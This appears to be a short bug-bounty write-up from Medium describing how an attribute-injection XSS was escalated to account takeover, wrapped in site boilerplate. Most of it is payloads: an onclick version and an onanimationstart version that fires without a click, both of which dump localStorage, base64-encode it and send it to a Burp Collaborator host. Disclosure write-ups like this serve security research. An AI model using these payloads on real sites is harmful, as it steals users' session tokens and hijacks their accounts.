How I managed to trigger XSS automatically to get critical account takeover

https://google.com"'/>
Broken HTML
https://google.com"onclick="alert('1')"a="
<a href="https://google.com" onclick="alert(1)" a=""> 
https://google.com"onclick="b=JSON.stringify(localStorage);c=btoa(b);i=new/**/Image;i.src='https://burpcollaborator.burpcollaborator.net?t='+c"a="
REDACTED CSS
https://google.com"onanimationstart="b=JSON.stringify(localStorage);c=btoa(b);i=new/**/Image;i.src=’https://burpcollaborator.burpcollaborator.net?t='+c"style="animation-name:Toastify__bounceOutRight
  • I put the malicious javascript code on the onanimationstart attribute.
  • I defined in tag’s style the animation found.

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Bitlab — HackTheBox Walkthrough

FOR NEWER SPAS LET’S USE AUTHORIZATION CODE FLOW WITH PKCE

What happens when you search for a kitten (on the Internet)

{UPDATE} Albert & Otto Hack Free Resources Generator

CYBERSECURITY AND US

Best Cybersecurity certifications online 2021

The Secure Edge: Daily Round-up of Infosec Blogs — Issue #13

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
c4rrilat0r

c4rrilat0r

More from Medium

How I Was Able To TakeOver Any Account On One Of Europe's Largest Media Companies

Response Manipulation leads to Account Takeover

Top 25 Subdomain Takeover Bug Bounty Reports

No Rate Limit at Reset Password Endpoint can Lead to account takeover (APPLE CORP)